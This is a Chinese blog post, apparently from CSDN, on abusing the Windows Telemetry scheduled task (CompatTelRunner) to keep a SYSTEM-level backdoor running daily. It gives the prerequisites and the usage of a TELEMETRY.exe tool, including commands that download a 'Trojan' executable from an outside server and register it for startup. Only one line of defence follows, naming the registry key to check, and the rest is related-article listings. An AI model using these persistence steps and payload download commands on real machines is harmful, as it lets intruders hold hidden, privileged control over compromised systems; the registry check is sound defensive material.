利用telemetry进行权限维持

最新推荐文章于 2024-06-07 09:36:52 发布
最新推荐文章于 2024-06-07 09:36:52 发布
阅读量4.6w 收藏 3
点赞数 3
分类专栏: 红蓝对抗 内网渗透 权限维持 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/110949623
版权

文章目录

利用条件

  1. 本地管理员权限(绕过UAC)
  2. 有Compatelrunner命令
  3. 系统版本:2008R2/Windows 7 through 2019/Windows 10

达成效果

每天以system权限执行一次后门文件

利用过程

下载利用脚本到主机上并执行,下列为脚本用法:

ABUSING WINDOWS TELEMETRY FOR PERSISTENCE
.Imanfeng
Features:
Install: - Deployment authority maintains backdoor

Command:
    TELEMETRY.exe install /command:calc
    -   Execute command without file backdoor

    TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe /path:C:\Windows\Temp\check.exe
    -   Remotely download Trojan files to the specified directory for backdoor startup

    TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe
    -   Remotely download Trojan files to C:\\Windows\\Temp\\compattelrun.exe for backdoor startup

    TELEMETRY.exe install /path:C:\Windows\Temp\check.exe
    -   Set path Trojan files for backdoor startup

Parameter:
    /command: -   Execute Command
    /url:     -   Download FROM
    /path:    -   Download To Execute command without file backdoor

Telemetry.exe install /command:calc
1

Telemetry.exe install /url:http://vps:8089/System.exe
2

原理

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/

防御手法

检测下面的键值是否合法:

HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController
Shanfenglan7
关注
专栏目录
Telemetry的项目及主要功能
煎鸡蛋汤
06-20 1万+
Telemetry,直译为遥测技术。在openstack中,是一个服务的名称,主要负责采集openstack中各组件资源使用率等关键数据 Telemetry,也可以看成是在openstack中负责Telemetry服务开发团队的名称。在2016年4月发布的Mitaka版本中为止,Telemetry由三个项目组成: Aodh,负责监控告警功能 Ceilometer,负责数据采集和持久化存储功能
一本你不能错过的红蓝攻防鸿篇巨著
等风来
10-27 4782
本书是一本针对安全领域的红蓝攻防对抗的专业书,既能作为安全从业者在红蓝攻防对抗活动中的指导用书,又能成为企业安全部门构建纵深防御体系的参考指南。希望本书所分析、讲述的红蓝双方视角下的攻防对抗手法,能帮助各行业的网络安全从业者增强实践、知己知彼,从企业内部构建起安全防御体系。
Telemetry:WINDOWS TELEMETRY权限维持
03-18
遥测 背景 是Windows持久性的C# 今天,我们将讨论一种持久性方法,该方法利用了Microsoft过去十年在Windows版本中包含的一些出色的遥测技术。 本地管理员的安装权限(要求具有写入HKLM的能力) 有CompatTelRunner.exe 2008R2 / Windows 7至2019 / Windows 10 优势 使用系统自己的遥测计划任务 仅注册表可疑后门故障排除 命令行用法 ABUSING WINDOWS TELEMETRY FOR PERSISTENCE .Imanfeng Features: Install: - Deployment authority maintains backdoor Command:
046-红队之浅谈基于Windows telemetry权限维持.pdf
09-20
046-红队之浅谈基于Windows telemetry权限维持.pdf
Telemetry原理
里晓山的博客
11-29 8051
举个订外卖的例子便于理解:YANG是个快餐店的菜谱,顾客想吃汉堡和炸鸡便照着YANG菜单写了一份A4纸采购清单(如一份汉堡,两份炸鸡),将清单折成邮票大小的小纸条装到了GPB信封里,找到门口的信使gRPC,信使gRPC骑上HTTP2电动车到了快餐店。利用telemetry技术,采集器可以收集到大量的设备数据,然后将数据交给分析器进行综合分析,分析器将决策结果发送给控制器,由控制器调整设备的配置,便可以几乎实时的反馈调整后的设备状态是否符合预期。动态订阅是指设备作为服务端,采集器作为客户端发起到设备的连接。
【博客559】更出色的网络监控采集方案---Telemetry(遥测技术)
qq_43684922的博客
12-17 2060
在网络设备测,Telemetry按照样yang模型组织数据,用GPB(goole protocol buffer)格式编码,并通过GRPC协议传输数据,使得数据的获取更高效,智能对接更便捷。
golang个人整理知识点
kelvin
12-13 1324
个人整理golang全面知识点
mqtt client: mymqtt. android version2.2
10-21
3. **Android Permissions**:为了访问网络并进行MQTT通信,应用需要在AndroidManifest.xml文件中声明INTERNET权限。 4. **Paho MQTT Client库**:由Eclipse Paho项目提供的开源库,支持多种语言,包括Java,是...
阿里云MQTT移植SDK3.2
04-22
阿里云MQTT移植SDK 3.2是一款专为开发者设计的工具,用于将MQTT(Message Queuing Telemetry Transport)协议接入到阿里云服务。这个SDK允许设备或应用程序与阿里云物联网平台进行通信,实现数据的可靠传输和远程...
利用Windows遥测技术的隐蔽持久化工具:TELEMETRY详解与应用
最新发布
gitblog_00062的博客
06-07 675
利用Windows遥测技术的隐蔽持久化工具:TELEMETRY详解与应用 项目地址:https://gitcode.com/360-Linton-Lab/Telemetry 在当今信息安全领域,隐秘且高效的技术手段成为了研究的热点。今日,我们将深入探讨一个创新项目——TELEMETRY,它巧妙利用了Windows系统过去十年间内置的遥测功能,为技术爱好者和安全研究人员提供了一种新颖的持久化驻留方法...
CompatTelRunner是啥进程,我可以关了吗?
热门推荐
tfel-ypoc
04-07 6万+
探究CompatTelRunner进程详细
权限维持简单总结
Aiwin的博客
08-17 4454
权限维持简单总结
内网渗透-windows权限维持的方法
lza20001103的博客
04-14 1377
内网渗透-windows权限维持的方法
Windows 权限维持手法
qq_53742230的博客
07-20 914
Windows 权限维持手法总结
ComBatTelRunner别作怪好吗?!
B100dGh0st的博客
03-05 9338
右键这个CompatTelRunner.exe查看属性,我们可以看到其描述为“Microsoft Compatibility Telemetry”---》“微软兼容性检测”的意思。 继续深入查找,发现原来是因为我们安装了一个一个名为KB2952664的补丁(具体请参考Microsoft  Support),其描述如下: 1 This
compattelrunner.exe占用磁盘过高_Microsoft Compatibility Telemetry服务占用磁盘和CPU
weixin_39535125的博客
11-24 1822
Microsoft Compatibility Telemetry服务占用磁盘和CPU问题描述:电脑在使用过程中占用磁盘和CPU过高,导致电脑反应缓慢,查看任务管理器是Microsoft Compatibility Telemetry服务占用磁盘和CPU。Microsoft Compatibility Telemetry是微软下的一个监测数据收集服务,如果加入Microsoft客户反馈改善计划,该...
Windows常见的几种权限维持
hackzkaq的博客
05-24 1700
零基础学黑客,搜索公众号:白帽子左一 1.映像劫持技术 简介 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。 当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助
Telemetry系统架构
煎鸡蛋汤
03-16 1万+
从2015年5月份左右开始接触telemetry,一直期待能够有一张图描述清楚我工作中要面对的整个项目,始终没有找到,经过这段时间的摸爬滚打,也积累了一点点东西,既然网上找不到,我就腆着脸皮做一张
Windows权限维持方法
weixin_43722879的博客
08-15 614
Windows权限维持方法
telemetry request
09-14
主机应当检索所有支持的Telemetry Data Areas的payload,以进行最佳的问题诊断。根据引用的说明,telemetry request中的Data Area 2和Data Area 3在Telemetry Data Block 1到Telemetry Data Block 1,000中会包含相同...
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值